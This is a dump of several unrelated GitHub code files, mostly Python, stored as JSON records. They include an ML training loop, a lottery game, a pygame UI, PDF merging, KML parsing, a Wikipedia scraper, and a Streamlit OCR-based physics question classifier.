accuracy_train /= n_train\n \n # if accuracy_val > best_val_acc:\n # best_val_acc = accuracy_val\n # best_val_acc_test_acc = accuracy_test\n # best_val_acc_epoch = epoch\n \n weights_dir = os.path.join(wandb.run.dir, wandb.run.name)\n os.makedirs(weights_dir, exist_ok=True)\n\n filename = f\"{wandb.run.name}_epoch{epoch}.pt\"\n torch.save(model, os.path.join(weights_dir, filename))\n\n log = {\n 'epoch': epoch,\n 'loss_fw_train': loss_fw_train,\n 'loss_bw_train': loss_bw_train,\n 'loss_fw_val:': loss_fw_val,\n 'loss_bw_val:': loss_bw_val,\n 'loss_fw_test:': loss_fw_test,\n 'loss_bw_test:': loss_bw_test,\n 'acc_train': accuracy_train,\n 'acc_val': accuracy_val,\n 'acc_test': accuracy_test,\n 'noise_seed': random_int,\n \"loss_val_avg\": loss_val_avg\n }\n\n epochs_list.append(epoch)\n loss_fw_train_list.append(loss_fw_train)\n loss_bw_train_list.append(loss_bw_train)\n loss_fw_val_list.append(loss_fw_val)\n loss_bw_val_list.append(loss_bw_val)\n loss_fw_test_list.append(loss_fw_test)\n loss_bw_test_list.append(loss_bw_test)\n acc_train_list.append(accuracy_train)\n acc_val_list.append(accuracy_val)\n acc_test_list.append(accuracy_test)\n \n wandb.log(log)\t\t\t\t\n print(log)\n\n # Stopping Criteria\n\n if loss_fw_val < lowest_loss_fw_val:\n lowest_loss_fw_val = loss_fw_val\n fw_increases = 0\n else:\n fw_increases += 1\n\n \n if loss_bw_val < lowest_loss_bw_val:\n lowest_loss_bw_val = loss_bw_val\n bw_increases = 0\n else:\n bw_increases += 1\n \n print(\"fw_increases:\",fw_increases,\"bw_increases:\",bw_increases)\n \n if fw_increases >= 10 and bw_increases >10:\n print(\"Early stopping triggered\")\n break # Exit the training loop\n\n # Plot losses of the fw task\n plt.figure()\n plt.plot(epochs_list, loss_fw_train_list, label='Training')\n plt.plot(epochs_list, loss_fw_val_list, label='Validation')\n plt.plot(epochs_list, loss_fw_test_list, label='Test')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.title('Losses of the FW Task')\n plt.legend()\n plt.savefig('plot1.png')\n\n # Plot losses of the bw task\n plt.figure()\n plt.plot(epochs_list, loss_bw_train_list, label='Training')\n plt.plot(epochs_list, loss_bw_val_list, label='Validation')\n plt.plot(epochs_list, loss_bw_test_list, label='Test')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.title('Losses of the BW Task')\n plt.legend()\n plt.savefig('plot2.png')\n\n # Plot accuracies\n plt.figure()\n plt.plot(epochs_list, acc_train_list, label='Training')\n plt.plot(epochs_list, acc_val_list, label='Validation')\n plt.plot(epochs_list, acc_test_list, label='Test')\n plt.xlabel('Epoch')\n plt.ylabel('Accuracy')\n plt.title('Accuracies')\n plt.legend()\n plt.savefig('plot3.png')\n\ndef eval_model(model, test_loader, get_x_y, loss_fw, loss_bw, b1_stochastic, b2_stochastic, b3_stochastic, cuda):\n correct = 0\n total = len(test_loader.dataset)\n loss_fw_train = 0\n loss_bw_train = 0\n model.eval() \n with torch.no_grad():\n for batch_id, batch in enumerate(test_loader):\n\n x, y = get_x_y(batch, cuda)\n if torch.cuda.is_available(): \n x = x.to(\"cuda\")\n y = y.to(\"cuda\")\n outputs, _, _ = model.forward(x, b1_stochastic, b2_stochastic, b3_stochastic)\n predicted = outputs.argmax(dim=1)\n # print(predicted.device)\n # print(y.device)\n correct += (predicted == y).sum().item()\n\n logits_bw, _ = model.backward(y, b1_stochastic, b2_stochastic)\n loss_val_bw = loss_bw(logits_bw, (x>0).to(dtype=x.dtype))\n loss_bw_train += loss_val_bw.mean(dim=-1).sum().item()\n\n loss_val_fw = loss_fw(outputs, y)\n loss_avg = loss_val_fw.mean()\n loss_fw_train += loss_val_fw.sum().item()\n\n accuracy = correct/total\n fw_loss = loss_fw_train/total\n bw_loss = loss_bw_train/total\n return accuracy, fw_loss, bw_loss\n\nif __name__ == '__main__':\n main()","repo_name":"ricardosimoes00/Thesis","sub_path":"Code/mnist_conv_stochastic.py","file_name":"mnist_conv_stochastic.py","file_ext":"py","file_size_in_byte":24315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"23625858213","text":"\"\"\"\n相比04更改如下:\n\n1、一次性行输入玩家信息,\n2、系统自动完成多线程的玩家抽奖\n\"\"\"\n\n\nimport random\nimport time \nimport threading\n\nclass Game(object):\n \"\"\"游戏类,记录显示最高分\"\"\"\n \n #最高得分记录\n g_score = 0\n g_name = None\n player_num = 0\n\n #静态函数,游戏帮助\n @staticmethod\n def show_help():\n print(\"这是一个中奖游戏,玩法很简单。\\n1、先逐一输入玩家姓名和抽奖次数;\\n2、等待系统给您抽奖,公布分数。\\n3、注意玩家姓名输入exit时结束输入。\\n现在您可以开始输入玩家信息了。\") \n time.sleep(1)\n print(\"*\" * 50)\n\n\n #类函数,显示最高得分\n @classmethod\n def show_score(cls):\n if cls.g_name is None:\n print(\"游戏还没有人玩过。\")\n else:\n print(\"本次游戏一共有%d人参与,游戏最高分是由【%s】获得的【%d】\" %\n (cls.player_num, cls.g_name,cls.g_score))\n \n \n @classmethod\n def game_over(cls):\n \n print(\"-\" * 40)\n print(\"\")\n print(\"让我们看看最后的得分情况:\")\n cls.show_score()\n time.sleep(1)\n print(\"game over!\")\n\n\n def __init__(self,name):\n self.p_name = name\n self.p_score = 0\n Game.player_num += 1\n\n def open_score(self):\n now_score = random.randint(1,101)\n\n if now_score > Game.g_score:\n if Game.g_name is None: \n print(\"恭喜【%s】以【%d】的高分,抢得第一次游戏最高记录\" %\n (self.p_name, now_score))\n else:\n print(\"恭喜【%s】以【%d】的高分,超过【%s】【%d】的历史最高分,创造新的记录\" %\n (self.p_name, now_score, Game.g_name, Game.g_score))\n Game.g_score = now_score\n Game.g_name = self.p_name\n #Game.show_score()\n #time.sleep(1)\n else:\n print(\"恭喜【%s】,获得【%d】分,还未打破记录\" % (self.p_name,\n now_score))\n time.sleep(1)\n \ndef get_score(p_name,num):\n g1 = Game(p_name)\n print(\"欢迎第%d个玩家【%s】加入游戏\" % (Game.player_num, p_name))\n time.sleep(random.random())\n\n i = 0\n while i < num:\n g1.open_score()\n i += 1\n print(\"玩家【%s】已完成次%d抽奖.\" % (p_name, num))\n\n\ndef get_games():\n\n t_games = list()\n while True:\n p_name = input(\"请输入玩家的名字:\")\n if p_name == \"exit\":\n print(\"玩家入场完毕,抽奖开始!\")\n time.sleep(1)\n break\n try:\n num = int(input(\"请输入玩家抽奖次数,最多9次:\"))\n if num < 1 or num > 9:\n print(\"您输入数字不在1-9之间,系统自动改为5次!\")\n num = 5\n except:\n print(\"您输入的非数字,系统自动改为5次!\")\n num = 5\n t = threading.Thread(target=get_score, args=(p_name, num))\n t_games.append(t)\n return t_games\n\n \ndef main():\n\n #显示游戏帮助\n Game.show_help()\n time.sleep(1)\n \n #获取玩家信息\n t_games = get_games()\n\n #开启所有玩家抽奖\n for t_game in t_games:\n t_game.start()\n \n #等待所有抽奖结束\n for t_game in t_games:\n t_game.join()\n\n #显示游戏结束信息\n Game.game_over()\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"qumogu/pystudy","sub_path":"1-3/07game05.py","file_name":"07game05.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"14308486380","text":"import pygame\n\n\nclass MyUI:\n def __init__(self):\n self.UISurface = pygame.Surface(pygame.display.get_surface().get_size())\n self.UISurface.set_colorkey((0, 0, 0))\n self.KapitelLogo = pygame.image.load(\"UI/Hauptmenu.png\")\n self.Szene = \"\"\n pygame.font.init()\n self.Schriften = pygame.font.SysFont('Comic Sam', 30)\n self.SzenenTitel = \"\"\n\n def KapitelLaden(self, name):\n self.KapitelLogo = pygame.image.load(\"UI/\" + name + \".png\")\n\n def SzeneLaden(self, name):\n self.SzenenTitel = name\n\n def draw(self, screen: pygame.Surface, frame):\n # Rahmen\n Size = pygame.display.get_surface().get_size()\n pygame.draw.rect(self.UISurface, (150, 150, 150), pygame.Rect((0, 0), Size))\n pygame.draw.rect(self.UISurface, (0, 0, 0),\n pygame.Rect((frame, frame), (Size[0] - 2 * frame, Size[1] - 2 * frame)))\n # Szenentitel\n Titelleiste = self.Schriften.render(self.SzenenTitel, False, (55, 55, 55))\n self.UISurface.blit(Titelleiste, (100, 100))\n\n # Kaptielbild\n self.UISurface.blit(pygame.transform.scale(self.KapitelLogo, (128, 64)), (0, 0))\n\n # Layer einbinden\n screen.blit(self.UISurface, (0, 0))\n","repo_name":"Kleinmergi/KnowledgeMachine2","sub_path":"UI/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"26072792414","text":"import fitz \r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\n\r\n# Função para unir dois PDFs\r\ndef merge_pdfs(pdf1_path, pdf2_path, output_path):\r\n pdf_document1 = fitz.open(pdf1_path) # Abre o primeiro PDF\r\n pdf_document2 = fitz.open(pdf2_path) # Abre o segundo PDF\r\n\r\n pdf_document1.insert_pdf(pdf_document2) # Insere o segundo PDF no primeiro\r\n\r\n pdf_document1.save(output_path) # Salva o PDF resultante\r\n pdf_document1.close()\r\n\r\n# Caminhos para os PDFs de entrada e saída\r\nmypath = r'C:\\Users\\Ander\\OneDrive\\Documentos\\JORGE_DOCUMENTOS\\GUAXUMA\\PDF_Atualizados_2'\r\npasta_pdf2 = r\"C:\\Users\\Ander\\OneDrive\\Documentos\\JORGE_DOCUMENTOS\\GUAXUMA\\PDF_Atualizados_3\"\r\npasta_geo = r\"C:\\Users\\Ander\\OneDrive\\Documentos\\JORGE_DOCUMENTOS\\GUAXUMA\\GEO\"\r\n\r\nlist_pdf = [f for f in listdir(mypath) if isfile(join(mypath, f))]\r\nlist_pdf_geo = [f for f in listdir(pasta_geo) if isfile(join(pasta_geo, f))]\r\nfor pdf in list_pdf:\r\n pdf_name = pdf\r\n if pdf_name in list_pdf_geo:\r\n pdf2_path = join(pasta_geo, pdf)\r\n pdf1_path = join(mypath, pdf)\r\n output_path = join(pasta_pdf2, pdf)\r\n merge_pdfs(pdf1_path, pdf2_path, output_path)\r\n\r\n else:\r\n print(pdf, 'não encontrado!')\r\n #faz uma copia do pdf e coloca na pasta 3\r\n pdf1_path = join(mypath, pdf)\r\n output_path = join(pasta_pdf2, pdf)\r\n save_pdf = fitz.open(pdf1_path)\r\n save_pdf.save(output_path)\r\n save_pdf.close()\r\n\r\n print(pdf, 'copiado com sucesso!')\r\n \r\n\r\n","repo_name":"popogis24/docx","sub_path":"geomerge.py","file_name":"geomerge.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"32108665610","text":"#sending a json input to the server\ntry:\n import simplejson as json\nexcept:\n import json\n\nimport requests\n\ndef get_data():\n # sample input for polygon\n input_data = {\n 'image_1': \"FlycaptureCamera-17302268-1197932057481579794.jpg\",\n 'image_2': \"\",\n 'label_1': \"instancemask__FlycaptureCamera-17302268-1197932057481579794.jpg.json\",\n 'label_2': \"\",\n 'predicted_label': \"\",\n 'semantic_seg': 'on',\n 'bounding_box': 'off',\n\n 'image_storage':'deepenstats',\n 'image_folder':'client_images/zippy/Zippy_batch4/Clip1',\n 'private_key_cloud': '/home/marium/storage_key/DeepenAIMain-e00ba37028bf.json',\n\n 'batch_script': 'on',\n 'count_of_images': 425,\n 'instance_mask_path': \"/home/marium/Zippy/outfiles/\",\n #'deepflow_results_path': \"/home/marium/deepentools/stats/\"\n 'deepflow_results_path_on_cloud': 'Deepflow_results/client_images/Zippy/Batch4/Clip1'\n }\n return input_data\n\nurl = 'http://127.0.0.1:8000/label_checker/home/'\n\nheaders = {'content-type': 'application/json'}\nr = requests.post(url, data=json.dumps(get_data()), headers=headers)\nr.text\n\nprint(\">> completed\")","repo_name":"steve550/test","sub_path":"stats/check_polygon.py","file_name":"check_polygon.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"22287787561","text":"import xml.etree.ElementTree as ET\nimport json\nimport os\nimport copy\n\n\nclass UpdateGeoJSONwithKML:\n\n def __init__(self, filename, kmldir):\n # Holds each polygon data\n self.polygon_dict = {\n \"type\": \"Feature\",\n \"geometry\": {\n \"type\": \"Polygon\",\n \"coordinates\": [\n [\n ]\n ]\n },\n \"properties\": {\n \"name\": \"\"\n }\n }\n\n # Reading data back\n with open(filename, 'r') as f:\n cjson = json.load(f)\n # for each kml file, parse it and add to json\n for k in os.listdir(kmldir):\n if k.endswith(\".kml\"):\n i = ParseKMLtoGeoJSON(k)\n j = copy.deepcopy(self.polygon_dict)\n j[\"geometry\"][\"coordinates\"][0] = i.polygon\n j[\"properties\"][\"name\"] = \"BEAT \" +\\\n i.name.upper()\n print(j)\n cjson[\"features\"].append(j)\n\n # Writing JSON data\n with open(filename, 'w') as f:\n json.dump(cjson, f)\n\n\nclass ParseKMLtoGeoJSON:\n\n def __init__(self, filename):\n doc = ET.parse(filename)\n root = doc.getroot()\n self.polygon = []\n placemark = self.findPlacemark(root)\n self.name, coords = self.extractData(placemark)\n self.parseCoords(coords)\n\n def findPlacemark(self, root):\n # find the tag that holds all the data for a place\n try:\n for i in root:\n for j in i:\n if \"placemark\" in j.tag.lower():\n return j\n except Exception:\n pass\n return -1\n\n def extractData(self, placemark):\n # get the coords and name of the place\n name = \"\"\n try:\n for i in placemark:\n if \"name\" in i.tag.lower():\n name = i.text.lower()\n if \"linestring\" in i.tag.lower():\n for j in i:\n if \"coord\" in j.tag.lower():\n coords = j.text\n return name, coords\n except Exception:\n pass\n return -1\n\n def parseCoords(self, coords):\n # parse all the coords into geojson compatible list of coordinates for\n # a polygon\n data = coords.strip(\"\\n\\r\\t\").split(\",0 \")\n for d in data:\n t = d.split(\",\")\n if len(t) > 1:\n self.polygon.append([float(t[0]), float(t[1]), 0])\n self.polygon.append(self.polygon[0])\n\nif \"__main__\" == __name__:\n UpdateGeoJSONwithKML(\"../js/beats.geojson\", \"./\")\n","repo_name":"RakshakTalwar/vincenthpd","sub_path":"web/kml/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"25902294831","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport random\n\nURL = \"https://en.wikipedia.org/wiki/100_Greatest_African_Americans\"\n\n\ndef scrape() -> list:\n driver = webdriver.Chrome()\n driver.get(URL)\n page = driver.page_source\n\n soup = BeautifulSoup(page, \"html.parser\")\n a = soup.select(\"div > ol > li > a\")\n\n people = {}\n for link in a:\n name = link.get('title')\n href = link.get('href')\n\n if \"(\" in name:\n i = name.index('(')\n name = name[:i - 1]\n\n people[name] = href\n\n random_name = random.choice(list(people.keys()))\n\n driver.get('https://en.wikipedia.org' + people[random_name])\n person_page = driver.page_source\n person_soup = BeautifulSoup(person_page, \"html.parser\")\n paragraphs = person_soup.find_all('p')\n\n # print(person_soup)\n # print('\\n')\n\n text = ''\n for p in paragraphs:\n text = text + p.text.strip()\n text = text.replace(\"negro\", \"\")\n\n text = text[:2048]\n\n # just to initialize img_address\n img_address = (person_soup.find_all('img')[4]).get('alt')\n images = (person_soup.find_all('img'))[:8]\n\n count = 0\n for i in images:\n # find first img of person\n if random_name in i.get('alt'):\n img_address = (i.get('src'))\n break\n count += 1\n\n img_address = img_address.replace(\" \", \"_\")\n\n # print(img_address)\n # print('https:' + img_address)\n\n driver.close()\n\n # person_arr = [text, 'https://en.wikipedia.org/wiki/File:' + img_address,\n # 'https://en.wikipedia.org' + people[random_name]]\n person_arr = [text, 'https:' + img_address,\n 'https://en.wikipedia.org' + people[random_name]]\n\n # person_arr: [text, img address, link to wiki page]\n print(person_arr)\n return person_arr\n\n\nif __name__ == '__main__':\n scrape()\n","repo_name":"nykoadionisio/potd","sub_path":"src/wikiscraper.py","file_name":"wikiscraper.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"27304306867","text":"import warnings\nimport streamlit as st\nimport gc\nfrom joblib import load\nimport PIL\nfrom PIL import Image\nimport re\nimport io\nimport os\nimport cv2\nimport xgboost\nimport pytesseract\nfrom PIL import Image\nfrom pix2tex.cli import LatexOCR\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nnltk.download('punkt')\nnltk.download('stopwords')\nnltk.download('wordnet')\n\nimport keras\nimport keras.backend as K\nfrom keras.models import load_model\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils import register_keras_serializable\n\nfrom transformers import DistilBertForSequenceClassification, DistilBertTokenizerFast\nimport torch\n\n# Define SelfAttention layer\n@keras.utils.register_keras_serializable()\nclass SelfAttention(keras.layers.Layer):\n def __init__(self):\n super(SelfAttention, self).__init__()\n\n def build(self, input_shape):\n self.W = self.add_weight(name=\"att_weight\", shape=(input_shape[-1], 1), initializer=\"normal\")\n self.b = self.add_weight(name=\"att_bias\", shape=(1,), initializer=\"zeros\")\n super(SelfAttention, self).build(input_shape)\n\n def call(self, x):\n et = K.squeeze(K.dot(x, self.W), axis=-1)\n et = et + self.b\n at = K.softmax(et, axis=1)\n at = K.expand_dims(at, axis=-1)\n output = x * at\n output = K.sum(output, axis=1)\n return output\n\n def compute_output_shape(self, input_shape):\n return input_shape[0], input_shape[-1]\n\ndef ocr(image):\n img = Image.open(image)\n try:\n model = LatexOCR()\n model(img)\n except:\n primary_path = 'streamlit_gallery/utils/weights.pth'\n alternative_path = '../../utils/weights.pth'\n try:\n LatexOCR.checkpoint_path = primary_path\n except:\n LatexOCR.checkpoint_path = alternative_path\n\n # Mention the installed location of Tesseract-OCR in your system\n #for mac local\n # pytesseract.pytesseract.tesseract_cmd = '/opt/homebrew/bin/tesseract'\n #for linux cloud\n pytesseract.pytesseract.tesseract_cmd = '/usr/bin/tesseract'\n\n # Read image from which text needs to be extracted\n img = cv2.imread(image)\n\n # Preprocessing the image starts\n\n # Convert the image to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n ret, thresh1 = cv2.threshold(gray, 0, 255, cv2.THRESH_OTSU | cv2.THRESH_BINARY_INV)\n\n rect_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (18, 18))\n\n # Applying dilation on the threshold image\n dilation = cv2.dilate(thresh1, rect_kernel, iterations=1)\n\n # Finding contours\n contours, hierarchy = cv2.findContours(dilation, \n cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_NONE)\n\n # Creating a copy of the image\n im2 = img.copy()\n\n # A text file is created and flushed\n file = open(\"recognized.txt\", \"w+\")\n file.write(\"\")\n file.close()\n\n for cnt in contours:\n x, y, w, h = cv2.boundingRect(cnt)\n\n # Drawing a rectangle on the copied image\n rect = cv2.rectangle(im2, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n # Cropping the text block for giving input to OCR\n cropped = im2[y:y + h, x:x + w]\n\n # Open the file in append mode\n file = open(\"recognized.txt\", \"a\")\n\n # Apply OCR on the cropped image\n text = pytesseract.image_to_string(cropped)\n\n # Appending the text into the file\n file.write(text)\n file.write(\"\\n\")\n\n # Close the file\n file.close()\n\n@st.cache_data\ndef read_data(file_name: str):\n \n physics = (pd\n .read_csv(file_name)\n .drop(columns=['Unnamed: 0.1', 'Unnamed: 0', 'Subject'])\n .rename(columns={'eng': 'question'}))\n \n return (physics\n .loc[(physics.topic == \"Electric Fields\") | (physics.topic == \"Wave Motion\") | \n (physics.topic == \"Temperature and ideal Gasses\") | (physics.topic == \"Nuclear Physics\") |\n (physics.topic == \"Forces\") | (physics.topic == \"D.C. Circuits\") |\n (physics.topic == \"Gravitational Field\") | (physics.topic == \"Quantum Physics\")]\n .assign(processed_question=lambda df_: df_['question'].apply(preprocess_text))\n )\n\n# Function to clean and preprocess text\ndef preprocess_text(text):\n # Remove newline characters\n text = text.replace('\\n', ' ')\n \n # Lowercase the text\n text = text.lower()\n \n # Remove numbers and punctuation\n text = re.sub('[^a-zA-Z]', ' ', text)\n \n # Tokenize\n words = word_tokenize(text)\n \n # Remove stopwords\n words = [word for word in words if word not in stopwords.words('english')]\n \n # Remove single-character words (like 'a', 'b', 'c')\n words = [word for word in words if len(word) > 1]\n \n # Lemmatize\n lemmatizer = WordNetLemmatizer()\n words = [lemmatizer.lemmatize(word) for word in words]\n \n # Join words back into a string\n text = ' '.join(words)\n \n return text\n\n@st.cache_resource\ndef load_vectorizer():\n primary_path = 'streamlit_gallery/utils/tfidf_vectorizer.joblib'\n alternative_path = '../../utils/tfidf_vectorizer.joblib'\n \n try:\n return load(primary_path)\n except FileNotFoundError:\n try:\n return load(alternative_path)\n except FileNotFoundError:\n raise Exception(\"Vectorizer not found in both primary and alternative directories!\")\n\n@st.cache_resource\ndef load_model_xgb():\n primary_path = 'streamlit_gallery/utils/best_model_physics_xgboost.joblib'\n alternative_path = '../../utils/best_model_physics_xgboost.joblib'\n \n try:\n return load(primary_path)\n except FileNotFoundError:\n try:\n return load(alternative_path)\n except FileNotFoundError:\n raise Exception(\"Model not found in both primary and alternative directories!\")\n\n@st.cache_resource \ndef load_model_logreg():\n primary_path = 'streamlit_gallery/utils/best_model_physics_logreg.joblib'\n alternative_path = '../../utils/best_model_physics_logreg.joblib'\n \n try:\n return load(primary_path)\n except FileNotFoundError:\n try:\n return load(alternative_path)\n except FileNotFoundError:\n raise Exception(\"Model not found in both primary and alternative directories!\")\n\n@st.cache_resource \ndef load_model_svc():\n primary_path = 'streamlit_gallery/utils/best_model_physics_svc.joblib'\n alternative_path = '../../utils/best_model_physics_svc.joblib'\n \n try:\n return load(primary_path)\n except FileNotFoundError:\n try:\n return load(alternative_path)\n except FileNotFoundError:\n raise Exception(\"Model not found in both primary and alternative directories!\")\n\n@st.cache_resource\ndef load_model_lstm_attention():\n \n primary_path = 'streamlit_gallery/utils/best_model_physics_lstm_attention_legacy.h5'\n alternative_path = '../../utils/best_model_physics_lstm_attention_legacy.h5'\n \n try:\n # return load_model(primary_path, \n # custom_objects={'SelfAttention': SelfAttention})\n # model_new = load(primary_path)\n # model_new.__class__.SelfAttention = SelfAttention\n \n model_new = load_model(primary_path)\n return model_new\n except FileNotFoundError:\n try:\n # return load_model(alternative_path, \n # custom_objects={'SelfAttention': SelfAttention})\n # model_new = load(alternative_path)\n # model_new.__class__.SelfAttention = SelfAttention\n \n model_new = load_model(alternative_path)\n return model_new\n except FileNotFoundError:\n raise Exception(\"Model not found in both primary and alternative directories!\")\n \ndef preprocess_lstm(df, new_text):\n \n X = df['processed_question'].values\n y = df['topic'].values\n \n tokenizer = Tokenizer(num_words=5000)\n tokenizer.fit_on_texts(X)\n \n X = tokenizer.texts_to_sequences(X)\n maxlen = 100\n X = pad_sequences(X, padding='post', maxlen=maxlen)\n \n new_text = tokenizer.texts_to_sequences([new_text])\n new_text = pad_sequences(new_text, padding='post', maxlen=maxlen)\n \n return new_text\n\n# @st.cache_resource \n# def load_model_bert():\n \n# primary_path = 'streamlit_gallery/utils/best_model_physics_bert.h5'\n# alternative_path = '../../utils/best_model_physics_bert.h5'\n \n# loaded_model = DistilBertForSequenceClassification.from_pretrained('distilbert-base-uncased', num_labels=8)\n \n# try:\n# loaded_model.load_state_dict(torch.load(primary_path, map_location=torch.device('cpu')), strict=False)\n# return loaded_model\n# except FileNotFoundError:\n# try:\n# loaded_model.load_state_dict(torch.load(alternative_path, map_location=torch.device('cpu')), strict=False)\n# return loaded_model\n# except FileNotFoundError:\n# raise Exception(\"Model not found in both primary and alternative directories!\")\n\n# def preprocess_bert(new_text):\n# # Tokenizer\n# tokenizerx = DistilBertTokenizerFast.from_pretrained('distilbert-base-uncased')\n# user_input_encodings = tokenizerx(preprocess_text(new_text), truncation=True, padding=True, return_tensors='pt')\n# return user_input_encodings\n\ndef get_label_mapping():\n \n labelencoder = load('labelencoder_physics.joblib')\n return labelencoder\n\ndef make_prediction_hard_vote(loaded_models, \n input_data, \n label_mapping):\n \n predictions = []\n predictions.append(loaded_models[0].predict(input_data[0]))\n predictions.append(loaded_models[1].predict(input_data[0]))\n predictions.append(loaded_models[2].predict(input_data[0]))\n predictions.append([np.argmax(loaded_models[3].predict(input_data[1]))])\n # with torch.no_grad():\n # output = loaded_models[4](**input_data[2])\n # logits = output.logits\n # predicted_class = torch.argmax(logits, dim=1).item()\n # predictions.append([predicted_class])\n \n final_prediction = stats.mode(predictions, axis=0, keepdims=True)[0]\n return label_mapping.inverse_transform(final_prediction[0])\n\n\n# def navigate_to_recommendation():\n# st.experimental_set_query_params(p=\"recommendation\")\n \ndef main():\n \n gc.enable()\n \n os.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\n \n df = read_data(\"Subject/Physics/physics_labelled_updated.csv\")\n \n # Title of the app\n st.subheader('Input Options')\n\n # Create tabs for image upload and text input\n tab1, tab2 = st.tabs([\"🖼️ Image Upload\", \"✍️ Enter Text\"])\n \n result = None\n uploaded_file = None\n user_input_text = None\n \n # Initialization\n if 'result' not in st.session_state:\n st.session_state['result'] = None\n \n with tab1:\n st.subheader(\"Image Upload\")\n \n # File uploader allows user to add file\n uploaded_file = st.file_uploader(\"Upload an image...\", type=['jpg', 'jpeg', 'png'])\n ###\n st.markdown(\"**Not sure what to upload?** Why not try these sample questions?\")\n \n col_sampleA, col_sampleB = st.columns(2)\n with col_sampleA:\n st.image(Image.open('streamlit_gallery/components/introduction/Forces 3.png'), caption='Sample Question 1', use_column_width=True)\n \n if st.button(\"Select\", key=\"sampleA\"):\n uploaded_file = Image.open(\"streamlit_gallery/components/introduction/Forces 3.png\")\n\n with col_sampleB:\n st.image(Image.open(\"streamlit_gallery/components/introduction/Quantum Physics 2.png\"), caption='Sample Question 2', use_column_width=True)\n \n if st.button(\"Select\", key=\"sampleB\"):\n uploaded_file = Image.open(\"streamlit_gallery/components/introduction/Quantum Physics 2.png\")\n \n st.divider()\n \n ###\n if uploaded_file is not None:\n # To read file as bytes:\n \n if isinstance(uploaded_file, PIL.Image.Image):\n image = uploaded_file\n file_extension = \".png\"\n \n else:\n bytes_data = uploaded_file.getvalue()\n \n # To convert to a PIL Image object (if the file is an image)\n image = Image.open(io.BytesIO(bytes_data)) \n file_extension = os.path.splitext(uploaded_file.name)[1]\n \n image_path = f\"image{file_extension}\"\n image.save(image_path)\n \n # Display the image\n st.image(image, caption='Uploaded Image.', use_column_width=True)\n \n # Call the OCR function or whatever processing you need\n ocr('image.png')\n\n st.subheader('Extracted Text')\n # Display the recognized text\n result = open(\"recognized.txt\", \"r\").read()\n st.write(result)\n st.session_state['result'] = result\n # uploaded_file = None\n \n hard_vote_prediction_result = make_prediction_hard_vote(loaded_models=[load_model_xgb(),\n load_model_logreg(),\n load_model_svc(),\n load_model_lstm_attention(),\n # load_model_bert(),\n ],\n input_data=[load_vectorizer().transform([preprocess_text(result)]),\n preprocess_lstm(df, preprocess_text(result)),\n # preprocess_bert(result)\n ],\n label_mapping=get_label_mapping())\n\n \n st.subheader(f\"Predicted Topic: {hard_vote_prediction_result[0]}\")\n st.session_state[\"predicted_topics\"] = hard_vote_prediction_result[0]\n # st.write(\"Need practice? Check out questions similar to this!\")\n \n # Define your button and assign the navigation function to it\n # practice_button = st.button(\"Practice!\", key=\"practice_button1\")\n\n # if practice_button:\n # Navigate to the recommendation page\n # navigate_to_recommendation()\n # Force a rerun of the script to reflect the query parameter change\n # st.rerun()\n \n else:\n st.warning(\"Please upload an image or enter text to get started!\")\n\n with tab2:\n st.header(\"Text Input\")\n \n user_input_text = st.text_area(\"Enter your text here...\")\n \n if user_input_text != \"\":\n uploaded_file = None\n result = user_input_text\n st.subheader('Your Text')\n st.write(result)\n st.session_state['result'] = result\n \n hard_vote_prediction_result = make_prediction_hard_vote(loaded_models=[load_model_xgb(),\n load_model_logreg(),\n load_model_svc(),\n load_model_lstm_attention(),\n # load_model_bert(),\n ],\n input_data=[load_vectorizer().transform([preprocess_text(result)]),\n preprocess_lstm(df, preprocess_text(result)),\n # preprocess_bert(result)\n ],\n label_mapping=get_label_mapping())\n\n \n st.subheader(f\"Predicted Topic: {hard_vote_prediction_result[0]}\")\n st.session_state[\"predicted_topics\"] = hard_vote_prediction_result[0]\n # st.write(\"Need practice? Check out questions similar to this!\")\n \n # Define your button and assign the navigation function to it\n # practice_button = st.button(\"Practice!\", key=\"practice_button2\")\n\n # if practice_button:\n # Navigate to the recommendation page\n # navigate_to_recommendation()\n # Force a rerun of the script to reflect the query parameter change\n # st.rerun()\n \n else:\n st.warning(\"Please upload an image or enter text to get started!\")\n \n gc.collect()\n\nif __name__ == \"__main__\":\n main()","repo_name":"AndreasL7/DBA4813AI","sub_path":"streamlit_gallery/components/introduction/introduction.py","file_name":"introduction.py","file_ext":"py","file_size_in_byte":17795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"41839269942","text":"current_users = ['John', 'stevie', 'Tropicana', 'true Clear', 'Beebee']\nnew_users = ['Mike', 'Hawk', 'Bumble', 'Tropicana', 'Stevie']\n\nlowerList = [item.lower() for item in current_users]\nprint(lowerList)\n\nfor user in 